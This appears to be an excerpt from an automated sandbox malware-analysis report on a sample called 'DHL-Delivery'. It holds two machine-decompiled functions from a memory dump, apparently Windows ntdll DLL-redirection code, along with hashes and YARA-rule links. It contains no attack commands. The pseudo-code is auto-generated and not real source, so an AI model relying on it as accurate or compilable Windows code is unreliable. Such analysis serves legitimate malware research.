                        • Instruction Fuzzy Hash: 3902F235A002A99FCB20CB64CC98BA977F2EF49700F1447F9E849ABA94D7749DC1CB51
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E0EFD60, Relevance: 6.7, Strings: 5, Instructions: 464COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E1E0EFD60(signed char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20, signed int _a24, intOrPtr* _a28, short _a32, intOrPtr* _a36) {
				signed int _v8;
				char _v140;
				short _v172;
				char _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				signed int _v196;
				signed int _v200;
				short* _v204;
				short* _v208;
				short* _v212;
				signed int _v214;
				char _v216;
				short _v224;
				short _v228;
				short* _v232;
				signed short* _v236;
				signed short* _v240;
				short _v242;
				char _v244;
				intOrPtr _v248;
				char _v252;
				intOrPtr _v256;
				char _v260;
				char* _v280;
				char _v284;
				char _v288;
				char _v292;
				signed int _v296;
				void* _v300;
				signed int _v304;
				void* _v312;
				signed int _v316;
				signed short _v320;
				char _v324;
				signed short _v328;
				signed short* _v332;
				signed int _v336;
				void* _v337;
				void* _v342;
				void* _v344;
				void* _v348;
				void* _v352;
				void* _v353;
				void* _v356;
				void* _v364;
				void* _v366;
				void* _v368;
				void* _v369;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t178;
				signed short* _t179;
				intOrPtr _t181;
				intOrPtr _t185;
				short* _t186;
				intOrPtr _t192;
				short* _t193;
				short* _t203;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				intOrPtr* _t234;
				intOrPtr* _t247;
				void* _t248;
				signed short* _t249;
				intOrPtr _t250;
				signed short* _t251;
				signed int _t252;
				intOrPtr* _t253;
				char* _t254;
				intOrPtr* _t260;
				short* _t261;
				signed short* _t264;
				signed int _t267;
				intOrPtr* _t269;
				void* _t270;
				intOrPtr* _t271;
				void* _t276;
				void* _t277;
				signed int _t278;
				void* _t280;
				signed int _t282;
				signed int _t284;

				_t284 = (_t282 & 0xfffffff8) - 0x154;
				_v8 =  *0x1e1d6360 ^ _t284;
				_t253 = _a28;
				_t263 = _a32;
				_t178 = _a36;
				_t247 = _a8;
				_v296 = _t253;
				_v324 = 0;
				_v320 = 0;
				_v280 =  &_v140;
				_v300 = _t263;
				_v284 = 0x800000;
				_v288 = 0;
				_v328 = 0;
				_v304 = 0;
				_t269 = _a20;
				if(_t253 != 0) {
					 *_t253 = 0;
				}
				if(_t263 != 0) {
					 *_t263 = 0;
				}
				if(_t178 != 0) {
					 *_t178 = 0x208;
				}
				if(_t269 != 0) {
					 *_t269 = 0;
					 *((short*)(_t269 + 2)) = 0;
					 *((intOrPtr*)(_t269 + 4)) = 0;
				}
				_t179 =  &_v172;
				_v228 = 0x20;
				_v236 = _t179;
				_v232 = _t179;
				_v240 = _t179;
				_v172 = 0;
				_t181 = _a16;
				_v224 = 0x20;
				_v244 = 0x200000;
				if(_t181 == 0) {
					_t254 =  &_v192;
					_v200 = 2;
					_v208 = _t254;
					_v204 = _t254;
					_v212 = _t254;
					_v196 = 2;
					_v192 = 0;
					_v216 = 0x20000;
				} else {
					_t267 =  *(_t181 + 2) & 0x0000ffff;
					_t261 =  *((intOrPtr*)(_t181 + 4));
					if(_t267 < 2) {
						_t261 =  &_v192;
						_t267 = 2;
					}
					_v208 = _t261;
					_v200 = _t267;
					_v204 = _t261;
					_v196 = _t267;
					_v212 = _t261;
					if(_t261 != 0) {
						 *_t261 = 0;
					}
					_v214 = _t267;
					_t263 = _v300;
					_v216 = 0;
				}
				_t256 = _a24;
				_v188 = _t181;
				_v184 = _t269;
				_v180 = _t256;
				_v176 = 1;
				if((_a4 & 0xfffffffe) != 0) {
					_t276 = 0xc000000d;
					goto L82;
				} else {
					if(_t247 == 0) {
						_t276 = 0xc000000d;
						L82:
						if(_t276 >= 0) {
							L57:
							_t182 = _v320;
							if(_v320 != 0) {
								E1E0DB4F0(_t182);
								_v328 = 0;
								_v324 = 0;
							}
							_t185 = _v236;
							if(_t185 != 0) {
								if(_t185 != _v232) {
									_v248 = _t185;
									E1E0F6440( &_v252);
								}
								_v236 = _v232;
								_v228 = _v224;
							}
							_t186 = _v232;
							_v240 = _t186;
							if(_t186 != 0) {
								_t256 = 0;
								 *_t186 = 0;
							}
							_v244 = 0;
							_v242 = _v224;
							if(_t276 == 0xc0150001) {
								E1E17CF30(_t256, "Internal error check failed", "minkernel\\ntdll\\sxsisol.cpp", 0x1b2, "Status != STATUS_SXS_SECTION_NOT_FOUND");
								_t276 = 0xc00000e5;
								goto L82;
							} else {
								_pop(_t270);
								_pop(_t277);
								_pop(_t248);
								return E1E1225C0(_t276, _t248, _v8 ^ _t284, _t263, _t270, _t277);
							}
						}
						L51:
						if(_v176 != 0) {
							_t192 = _v208;
							if(_t192 != 0 && _t192 != _v204) {
								_v256 = _t192;
								E1E0F6440( &_v260);
							}
							_t193 = _v204;
							if(_t193 != 0) {
								_t256 = 0;
								 *_t193 = 0;
							}
						}
						E1E1269F0( &_v216, 0, 0x2c);
						_t284 = _t284 + 0xc;
						goto L57;
					}
					if(_t181 == 0) {
						if(_t269 != 0 || _t263 == 0) {
							L15:
							_t256 = 0;
							_t249 =  *(_t247 + 4);
							_v336 =  *_t247;
							_t203 = _a12;
							_v332 = _t249;
							_v337 = 0;
							if(_t203 == 0 ||  *_t203 == 0) {
								L23:
								_t276 = 0;
								goto L24;
							} else {
								_t252 = 0;
								_t280 = E1E0F0F90(1,  &_v336, 0x1e0b10f0,  &_v292);
								if(_t280 < 0) {
									if(_t280 == 0xc0000225) {
										L19:
										_t276 = 0;
										L20:
										if(_t276 < 0) {
											_t249 = _v332;
											L98:
											_t256 = _v337;
											L24:
											if(_t276 < 0) {
												goto L51;
											}
											if(_t256 != 0) {
												_t249 = _v240;
												_v336 = _v244;
												_v332 = _t249;
											}
											_v312 = 0;
											_v337 = 0;
											if(_v320 != 0) {
												_t276 = 0xc000000d;
												goto L42;
											} else {
												_t225 = _v336;
												if(_t225 < 2) {
													L30:
													if(_t225 < 4 ||  *_t249 == 0 || _t249[1] != 0x3a || _t225 < 6) {
														L40:
														_t226 = _v337;
														goto L41;
													} else {
														_t227 = _t249[2] & 0x0000ffff;
														if(_t227 != 0x5c) {
															if(_t227 != 0x2f) {
																goto L40;
															}
														}
														_v316 = 2;
														L36:
														_t276 = E1E0F1160( &_v336,  &_v284,  &_v324,  &_v312, 0, 0,  &_v316, 0);
														if(_t276 < 0) {
															L42:
															_t205 = _v320;
															if(_v320 != 0) {
																E1E0DB4F0(_t205);
																_v328 = 0;
																_v324 = 0;
															}
															L43:
															if(_t276 < 0) {
																goto L51;
															}
															if((_a4 & 0x00000001) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x10)) == 0 || ( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00001000) == 0) {
																L47:
																_t250 = _a16;
																if((_v304 & 0x00000001) != 0) {
																	L77:
																	if(_t269 == 0) {
																		if(_t250 == 0 || _v212 ==  *((intOrPtr*)(_t250 + 4))) {
																			goto L78;
																		} else {
																			_t276 = 0xc0000023;
																			goto L82;
																		}
																	}
																	L78:
																	_t271 = _v300;
																	if(_t271 != 0) {
																		_t276 = E1E0F0F90(1,  &_v216, 0x1e0b18a0,  &_v328);
																		if(_t276 < 0) {
																			goto L51;
																		}
																		 *_t271 = ((_v328 & 0x0000ffff) >> 1) + 1;
																	}
																	_t256 =  &_v216;
																	_t276 = E1E11997F( &_v216);
																	if(_t276 < 0) {
																		goto L51;
																	}
																	_t256 = _v296;
																	if(_t256 != 0) {
																		 *_t256 = _v304;
																	}
																	_t276 = 0;
																	goto L82;
																}
																if(_t250 == 0) {
																	if(_t269 != 0) {
																		goto L49;
																	}
																	_t263 = 1;
																	L50:
																	_t256 =  &_v336;
																	_t276 = E1E0F02C0( &_v336, _t263,  &_v288, _v296,  &_v216);
																	if(_t276 >= 0) {
																		goto L77;
																	}
																	goto L51;
																}
																L49:
																_t263 = 0;
																goto L50;
															} else {
																_t263 =  &_v216;
																_t256 =  &_v336;
																_t276 = E1E16AE6E( &_v336,  &_v216,  &_v304);
																if(_t276 < 0) {
																	goto L51;
																}
																goto L47;
															}
														}
														_t234 = _v312;
														_t278 =  *_t234;
														_t251 =  *((intOrPtr*)(_t234 + 4));
														_v312 = _t278;
														if(_v316 == 6) {
															_t264 = _v332;
															if( *((short*)(_t264 + 0xa)) != 0x3a ||  *((short*)(_t264 + 0xc)) != 0x5c) {
																goto L38;
															} else {
																_v332 = _t264 + 8;
																_t256 = _v336 + 0xfff8;
																 *((intOrPtr*)(_t284 + 0x16)) =  *((intOrPtr*)(_t284 + 0x16)) + 0xfff8;
																_t263 = _v312 + 0xfff8;
																_t251 = _t251 + 8;
																_v312 = _t263;
																 *((intOrPtr*)(_t284 + 0x2e)) =  *((intOrPtr*)(_t284 + 0x2e)) + 0xfff8;
																_t278 = _v312;
																_v336 = _t256;
																L39:
																if(_t256 > _t263) {
																	_t256 =  &_v324;
																	if(_t234 ==  &_v324) {
																		_t226 = 1;
																	} else {
																		_t226 = _v337;
																	}
																	_v336 = _t278;
																	_v332 = _t251;
																	L41:
																	_t276 = 0;
																	if(_t226 != 0) {
																		goto L43;
																	}
																	goto L42;
																}
																goto L40;
															}
														}
														L38:
														_t256 = _v336;
														_t263 = _v312;
														goto L39;
													}
												}
												_t256 =  *_t249 & 0x0000ffff;
												if(_t256 == 0x5c || _t256 == 0x2f) {
													if(_t225 < 4) {
														goto L40;
													}
													_t256 = _t249[1] & 0x0000ffff;
													if(_t256 == 0x5c || _t256 == 0x2f) {
														if(_t225 < 6) {
															L111:
															_v316 = 1;
															goto L36;
														}
														_t256 = _t249[2] & 0x0000ffff;
														if(_t256 == 0x2e || _t256 == 0x3f) {
															if(_t225 < 8) {
																L110:
																if(_t225 == 6) {
																	goto L40;
																}
																goto L111;
															}
															_t256 = _t249[3] & 0x0000ffff;
															if(_t256 == 0x5c || _t256 == 0x2f) {
																_v316 = 6;
																goto L36;
															} else {
																goto L110;
															}
														} else {
															goto L111;
														}
													} else {
														goto L40;
													}
												} else {
													goto L30;
												}
											}
										}
										_t249 = _v332;
										if(_t252 == 0) {
											_t260 = _a12;
											 *(_t284 + 0x50) = _v336;
											 *(_t284 + 0x54) = _t249;
											 *((intOrPtr*)(_t284 + 0x58)) =  *_t260;
											 *((intOrPtr*)(_t284 + 0x5c)) =  *((intOrPtr*)(_t260 + 4));
											_v244 = 0;
											_t276 = E1E111500(_t260,  &_v244, 2, _t284 + 0x50);
											if(_t276 < 0) {
												goto L98;
											}
											_t256 = 1;
											goto L23;
										}
										_t256 = _v337;
										goto L23;
									}
									goto L20;
								}
								_t252 = 1;
								goto L19;
							}
						} else {
							L96:
							_t276 = 0xc000000d;
							goto L82;
						}
					}
					if(_t269 == 0 || _t256 != 0) {
						goto L15;
					} else {
						goto L96;
					}
				}
			}


























































































                        0x1e0efd68
                        0x1e0efd75
                        0x1e0efd7c
                        0x1e0efd7f
                        0x1e0efd82
                        0x1e0efd86
                        0x1e0efd8c
                        0x1e0efd90
                        0x1e0efd94
                        0x1e0efd9f
                        0x1e0efda5
                        0x1e0efda9
                        0x1e0efdb1
                        0x1e0efdb9
                        0x1e0efdbe
                        0x1e0efdc3
                        0x1e0efdc8
                        0x1e0f020c
                        0x1e0f020c
                        0x1e0efdd0
                        0x1e0f0286
                        0x1e0f0286
                        0x1e0efdd8
                        0x1e0f028d
                        0x1e0f028d
                        0x1e0efde0
                        0x1e0efde4
                        0x1e0efde6
                        0x1e0efdea
                        0x1e0efdea
                        0x1e0efded
                        0x1e0efdf4
                        0x1e0efdff
                        0x1e0efe03
                        0x1e0efe07
                        0x1e0efe0d
                        0x1e0efe15
                        0x1e0efe18
                        0x1e0efe23
                        0x1e0efe2d
                        0x1e0f013b
                        0x1e0f0142
                        0x1e0f014d
                        0x1e0f0154
                        0x1e0f015b
                        0x1e0f0164
                        0x1e0f016f
                        0x1e0f0177
                        0x1e0efe33
                        0x1e0efe33
                        0x1e0efe37
                        0x1e0efe3d
                        0x1e140796
                        0x1e14079d
                        0x1e14079d
                        0x1e0efe43
                        0x1e0efe4a
                        0x1e0efe51
                        0x1e0efe58
                        0x1e0efe5f
                        0x1e0efe68
                        0x1e0efe6c
                        0x1e0efe6c
                        0x1e0efe71
                        0x1e0efe79
                        0x1e0efe7d
                        0x1e0efe7d
                        0x1e0efe8c
                        0x1e0efe8f
                        0x1e0efe96
                        0x1e0efe9d
                        0x1e0efea4
                        0x1e0efeac
                        0x1e1407a7
                        0x00000000
                        0x1e0efeb2
                        0x1e0efeb4
                        0x1e1407b1
                        0x1e0f0260
                        0x1e0f0262
                        0x1e0f00bd
                        0x1e0f00bd
                        0x1e0f00c3
                        0x1e140943
                        0x1e14094a
                        0x1e14094e
                        0x1e14094e
                        0x1e0f00c9
                        0x1e0f00cf
                        0x1e0f00d5
                        0x1e0f0298
                        0x1e0f02a1
                        0x1e0f02a1
                        0x1e0f00df
                        0x1e0f00ea
                        0x1e0f00ea
                        0x1e0f00f1
                        0x1e0f00f5
                        0x1e0f00fb
                        0x1e0f00fd
                        0x1e0f00ff
                        0x1e0f00ff
                        0x1e0f0104
                        0x1e0f0111
                        0x1e0f011c
                        0x1e14096b
                        0x1e140970
                        0x00000000
                        0x1e0f0122
                        0x1e0f012b
                        0x1e0f012c
                        0x1e0f012d
                        0x1e0f0138
                        0x1e0f0138
                        0x1e0f011c
                        0x1e0f0077
                        0x1e0f007f
                        0x1e0f0081
                        0x1e0f008a
                        0x1e14092f
                        0x1e140938
                        0x1e140938
                        0x1e0f0099
                        0x1e0f00a2
                        0x1e0f00a4
                        0x1e0f00a6
                        0x1e0f00a6
                        0x1e0f00a2
                        0x1e0f00b5
                        0x1e0f00ba
                        0x00000000
                        0x1e0f00ba
                        0x1e0efebc
                        0x1e0f0189
                        0x1e0efece
                        0x1e0efed0
                        0x1e0efed2
                        0x1e0efed5
                        0x1e0efed9
                        0x1e0efedc
                        0x1e0efee0
                        0x1e0efee6
                        0x1e0eff2c
                        0x1e0eff2c
                        0x00000000
                        0x1e0efeee
                        0x1e0efef2
                        0x1e0eff06
                        0x1e0eff0a
                        0x1e0f01a7
                        0x1e0eff12
                        0x1e0eff12
                        0x1e0eff14
                        0x1e0eff16
                        0x1e1407cd
                        0x1e1407d1
                        0x1e1407d1
                        0x1e0eff2e
                        0x1e0eff30
                        0x00000000
                        0x00000000
                        0x1e0eff38
                        0x1e0f01fb
                        0x1e0f01ff
                        0x1e0f0203
                        0x1e0f0203
                        0x1e0eff43
                        0x1e0eff4b
                        0x1e0eff50
                        0x1e1407da
                        0x00000000
                        0x1e0eff56
                        0x1e0eff56
                        0x1e0eff5f
                        0x1e0eff76
                        0x1e0eff7a
                        0x1e0efff9
                        0x1e0efff9
                        0x00000000
                        0x1e0eff8f
                        0x1e0eff8f
                        0x1e0eff96
                        0x1e14084f
                        0x00000000
                        0x00000000
                        0x1e140855
                        0x1e0eff9c
                        0x1e0effa4
                        0x1e0effc8
                        0x1e0effcc
                        0x1e0f0003
                        0x1e0f0003
                        0x1e0f0009
                        0x1e0f0214
                        0x1e0f021b
                        0x1e0f021f
                        0x1e0f021f
                        0x1e0f000f
                        0x1e0f0011
                        0x00000000
                        0x00000000
                        0x1e0f0017
                        0x1e0f003b
                        0x1e0f0040
                        0x1e0f0043
                        0x1e0f0228
                        0x1e0f022a
                        0x1e1408dd
                        0x00000000
                        0x1e1408f3
                        0x1e1408f3
                        0x00000000
                        0x1e1408f3
                        0x1e1408dd
                        0x1e0f0230
                        0x1e0f0230
                        0x1e0f0236
                        0x1e140916
                        0x1e14091a
                        0x00000000
                        0x00000000
                        0x1e140928
                        0x1e140928
                        0x1e0f023c
                        0x1e0f0248
                        0x1e0f024c
                        0x00000000
                        0x00000000
                        0x1e0f0252
                        0x1e0f0258
                        0x1e0f02af
                        0x1e0f02af
                        0x1e0f025a
                        0x00000000
                        0x1e0f025a
                        0x1e0f004b
                        0x1e0f0196
                        0x00000000
                        0x00000000
                        0x1e1408d4
                        0x1e0f0053
                        0x1e0f0064
                        0x1e0f006d
                        0x1e0f0071
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0f0071
                        0x1e0f0051
                        0x1e0f0051
                        0x00000000
                        0x1e1408b0
                        0x1e1408b5
                        0x1e1408bc
                        0x1e1408c5
                        0x1e1408c9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e1408cf
                        0x1e0f0017
                        0x1e0effd3
                        0x1e0effd7
                        0x1e0effd9
                        0x1e0effdc
                        0x1e0effe0
                        0x1e14085a
                        0x1e140863
                        0x00000000
                        0x1e140874
                        0x1e140881
                        0x1e14088a
                        0x1e14088d
                        0x1e140892
                        0x1e140895
                        0x1e140898
                        0x1e14089d
                        0x1e1408a2
                        0x1e1408a6
                        0x1e0efff0
                        0x1e0efff3
                        0x1e0f026d
                        0x1e0f0273
                        0x1e0f02b3
                        0x1e0f0275
                        0x1e0f0275
                        0x1e0f0275
                        0x1e0f0279
                        0x1e0f027d
                        0x1e0efffd
                        0x1e0efffd
                        0x1e0f0001
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0f0001
                        0x00000000
                        0x1e0efff3
                        0x1e140863
                        0x1e0effe6
                        0x1e0effe6
                        0x1e0effeb
                        0x00000000
                        0x1e0effeb
                        0x1e0eff7a
                        0x1e0eff61
                        0x1e0eff67
                        0x1e1407e8
                        0x00000000
                        0x00000000
                        0x1e1407ee
                        0x1e1407f5
                        0x1e140804
                        0x1e14083f
                        0x1e14083f
                        0x00000000
                        0x1e14083f
                        0x1e140806
                        0x1e14080d
                        0x1e140818
                        0x1e140835
                        0x1e140839
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e140839
                        0x1e14081a
                        0x1e140821
                        0x1e140828
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0eff67
                        0x1e0eff50
                        0x1e0eff1e
                        0x1e0eff22
                        0x1e0f01b2
                        0x1e0f01b9
                        0x1e0f01bd
                        0x1e0f01c3
                        0x1e0f01ca
                        0x1e0f01d0
                        0x1e0f01e6
                        0x1e0f01ea
                        0x00000000
                        0x00000000
                        0x1e0f01f0
                        0x00000000
                        0x1e0f01f0
                        0x1e0eff28
                        0x00000000
                        0x1e0eff28
                        0x00000000
                        0x1e0f01ad
                        0x1e0eff10
                        0x00000000
                        0x1e0eff10
                        0x1e1407c3
                        0x1e1407c3
                        0x1e1407c3
                        0x00000000
                        0x1e1407c3
                        0x1e0f0189
                        0x1e0efec4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0efec4

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                        • API String ID: 0-3393094623
                        • Opcode ID: 02960b9cad06e95d8d3409e42618b1edf80bf37c09fb547e3bde92c26bff900f
                        • Instruction ID: ca607245e27a0e6fc2ca17b1f7feaec670cf72ff96434133499324457c610a83
                        • Opcode Fuzzy Hash: 02960b9cad06e95d8d3409e42618b1edf80bf37c09fb547e3bde92c26bff900f
                        • Instruction Fuzzy Hash: 60025875908382CFD320CF65C590B9BB7E2BF89744F104A2EE98997251E770D885CBA2
                        Uniqueness

                        Uniqueness Score: 6.12%

                        Function 1E161F50, Relevance: 6.5, Strings: 5, Instructions: 247COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E1E161F50(signed short* _a4, signed int* _a8, short* _a12) {
				unsigned int _v8;
				void* _v12;
				signed short _v16;
				unsigned int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed short* _t85;
				unsigned int _t86;
				signed short _t99;
				short* _t108;
				signed int _t110;
				signed int _t112;
				signed int _t129;
				signed short _t131;
				signed int _t132;
				signed short _t134;
				short* _t143;
				signed int _t147;
				signed int _t149;
				unsigned int _t150;
				void* _t152;
				void* _t153;
				signed short _t154;
				signed int _t155;
				signed int* _t158;
				short* _t159;
				signed short* _t160;
				unsigned int _t166;
				signed short _t167;
				signed int _t169;
				unsigned int _t170;
				signed int _t172;
				signed short _t176;
				intOrPtr _t177;
				unsigned int _t178;
				unsigned int _t180;
				signed int _t183;
				void* _t184;
				signed int _t186;
				void* _t187;
				void* _t188;

				_t85 = _a4;
				_t149 = 0;
				_v40 = 0;
				_t176 =  *_t85 & 0x0000ffff;
				_t154 = _t85[2];
				_t86 = _t176 & 0x0000ffff;
				_v16 = _t154;
				_v24 = 0;
				_v20 = _t176;
				_v12 = 0x5c;
				_v28 = 0x2f;
				_t170 = _t86;
				if(_t86 == 0) {
					L11:
					_v20 = 0;
					_v44 = 0;
					asm("sbb eax, eax");
					_v36 = ( ~_t149 & 0xfffffff8) + 8;
					_v8 = _t170 - (_v16 - _t154 & 0xfffffffe);
					_t172 =  *0x1e1cfe94; // 0x0
					if(_t172 != 0) {
						_t155 =  *0x1e1cfe90 & 0x0000ffff;
						_t150 = 0;
						_v20 = _v12;
						if(_t155 == 0) {
							L32:
							_t166 = _v8;
							L33:
							_t99 = _v36 + 0xe + _t150 + _v20 + _t166 + 2;
							_v32 = _t99;
							if(_t99 > 0xfffe) {
								L22:
								return 0xc0000106;
							}
							_t177 = E1E0F113F(_t99 & 0x0000ffff);
							_v36 = _t177;
							if(_t177 != 0) {
								E1E126370(_t177, _t172, _t150);
								_t188 = _t187 + 0xc;
								_t152 = _t177 + (_t150 >> 1) * 2;
								_t178 = _v20;
								if(_t178 != 0) {
									E1E126370(_t152, L"\\microsoft.system.package.metadata\\Application", _t178);
									_t188 = _t188 + 0xc;
									_t152 = _t152 + (_t178 >> 1) * 2;
								}
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t180 = _v8;
								 *((short*)(_t152 + 0xc)) = _v12;
								_t153 = _t152 + 0xe;
								E1E126370(_t153, _v16, _t180);
								_t108 = _t153 + (_t180 >> 1) * 2;
								if(_v24 != 0) {
									 *_t108 = 0;
								} else {
									asm("movsd");
									asm("movsd");
									asm("movsw");
								}
								_t158 = _a8;
								_t167 = _v44;
								_t158[1] = _v40;
								_t110 = _t167 & 0x0000ffff;
								_t158[0] = _t110;
								 *_t158 = _t110;
								if(_t167 != 0) {
									 *_t158 = _t110 + 0xfffffffe;
								}
								_t159 = _a12;
								 *((intOrPtr*)(_t159 + 4)) = _v36;
								_t112 = _v32 & 0x0000ffff;
								 *(_t159 + 2) = _t112;
								 *_t159 = _t112 + 0xfffffffe;
								return 0;
							}
							L35:
							return 0xc0000017;
						}
						while( *((short*)(_t172 + (_t150 >> 1) * 2)) != 0x3b) {
							_t150 = _t150 + 2;
							if(_t150 < _t155) {
								continue;
							}
							goto L32;
						}
						goto L32;
					}
					_t150 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff;
					_t172 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c);
					_v32 = _t172;
					if(( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00000001) == 0) {
						_t172 = _t172 +  *((intOrPtr*)( *[fs:0x30] + 0x10));
						_v32 = _t172;
					}
					_t160 = _t172 + ((_t150 >> 1) - 1) * 2;
					_t129 = _t172;
					while(_t160 > _t172) {
						_t169 =  *_t160 & 0x0000ffff;
						if(_t169 == _v12 || _t169 == _v28) {
							_t129 =  &(_t160[1]);
							L21:
							_t131 = _t129 - _t172 & 0xfffffffe;
							if(_t131 <= 0xfffe) {
								_t132 = _t131 & 0x0000ffff;
								_v28 = _t132;
								if(_t176 > 0xfffc) {
									goto L22;
								}
								_t134 = _t132 + _v36 + _v8 + 2;
								if(_t134 > 0xfffe) {
									goto L22;
								}
								_v44 = _t134 & 0x0000ffff;
								_t183 = E1E0F113F(_t134 & 0x0000ffff);
								_v40 = _t183;
								if(_t183 == 0) {
									goto L35;
								}
								E1E126370(_t183, _t172, _v28);
								_t184 = _t183 + (_v28 >> 1) * 2;
								E1E126370(_t184, _v16, _v8);
								_t166 = _v8;
								_t187 = _t187 + 0x18;
								_t143 = _t184 + (_t166 >> 1) * 2;
								if(_v24 != 0) {
									 *_t143 = 0;
								} else {
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t172 = _v32;
								}
								goto L33;
							}
							goto L22;
						} else {
							_t160 = _t160 - 2;
							continue;
						}
					}
					goto L21;
				}
				_t147 = _t154 + ((_t86 >> 1) - 1) * 2;
				if(_t147 <= _t154) {
					goto L11;
				} else {
					goto L2;
				}
				do {
					L2:
					_t186 =  *_t147 & 0x0000ffff;
					if(_t186 != 0x2e) {
						if(_t186 == _v12 || _t186 == _v28) {
							_v16 = _t147 + 2;
							L10:
							_t176 = _v20;
							goto L11;
						} else {
							goto L7;
						}
					} else {
						if(_t149 == 0) {
							_t149 = _t147;
							_v24 = _t149;
						}
					}
					L7:
					_t147 = _t147 - 2;
				} while (_t147 > _t154);
				goto L10;
			}
















































                        0x1e161f58
                        0x1e161f5f
                        0x1e161f61
                        0x1e161f64
                        0x1e161f67
                        0x1e161f6a
                        0x1e161f6d
                        0x1e161f70
                        0x1e161f73
                        0x1e161f76
                        0x1e161f7d
                        0x1e161f85
                        0x1e161f8a
                        0x1e161fc7
                        0x1e161fc9
                        0x1e161fce
                        0x1e161fd1
                        0x1e161fd9
                        0x1e161fe6
                        0x1e161fe9
                        0x1e161ff1
                        0x1e1620ee
                        0x1e1620f5
                        0x1e1620fa
                        0x1e1620ff
                        0x1e162113
                        0x1e162113
                        0x1e162116
                        0x1e162124
                        0x1e162126
                        0x1e16212e
                        0x1e162061
                        0x00000000
                        0x1e162061
                        0x1e16213d
                        0x1e16213f
                        0x1e162144
                        0x1e162153
                        0x1e16215a
                        0x1e16215d
                        0x1e162160
                        0x1e162165
                        0x1e16216e
                        0x1e162173
                        0x1e162178
                        0x1e162178
                        0x1e162185
                        0x1e162186
                        0x1e162187
                        0x1e162188
                        0x1e16218f
                        0x1e162193
                        0x1e162197
                        0x1e1621a7
                        0x1e1621aa
                        0x1e1621bb
                        0x1e1621ac
                        0x1e1621b3
                        0x1e1621b4
                        0x1e1621b5
                        0x1e1621b5
                        0x1e1621be
                        0x1e1621c4
                        0x1e1621c7
                        0x1e1621ca
                        0x1e1621cd
                        0x1e1621d1
                        0x1e1621d6
                        0x1e1621db
                        0x1e1621db
                        0x1e1621de
                        0x1e1621e7
                        0x1e1621ea
                        0x1e1621ed
                        0x1e1621f4
                        0x00000000
                        0x1e1621f7
                        0x1e162146
                        0x00000000
                        0x1e162146
                        0x1e162101
                        0x1e16210c
                        0x1e162111
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e162111
                        0x00000000
                        0x1e162101
                        0x1e162000
                        0x1e16200d
                        0x1e162016
                        0x1e162020
                        0x1e162028
                        0x1e16202b
                        0x1e16202b
                        0x1e162033
                        0x1e162036
                        0x1e16204c
                        0x1e16203a
                        0x1e162041
                        0x1e162052
                        0x1e162055
                        0x1e162057
                        0x1e16205f
                        0x1e162070
                        0x1e162073
                        0x1e162079
                        0x00000000
                        0x00000000
                        0x1e162084
                        0x1e16208b
                        0x00000000
                        0x00000000
                        0x1e162091
                        0x1e162099
                        0x1e16209b
                        0x1e1620a0
                        0x00000000
                        0x00000000
                        0x1e1620ab
                        0x1e1620bb
                        0x1e1620bf
                        0x1e1620c4
                        0x1e1620c7
                        0x1e1620d2
                        0x1e1620d5
                        0x1e1620e9
                        0x1e1620d7
                        0x1e1620de
                        0x1e1620df
                        0x1e1620e0
                        0x1e1620e2
                        0x1e1620e2
                        0x00000000
                        0x1e1620d5
                        0x00000000
                        0x1e162049
                        0x1e162049
                        0x00000000
                        0x1e162049
                        0x1e162041
                        0x00000000
                        0x1e162050
                        0x1e161f8f
                        0x1e161f94
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e161f96
                        0x1e161f96
                        0x1e161f96
                        0x1e161f9c
                        0x1e161fad
                        0x1e161fc1
                        0x1e161fc4
                        0x1e161fc4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e161f9e
                        0x1e161fa0
                        0x1e161fa2
                        0x1e161fa4
                        0x1e161fa4
                        0x1e161fa0
                        0x1e161fb5
                        0x1e161fb5
                        0x1e161fb8
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                        • API String ID: 0-2518169356
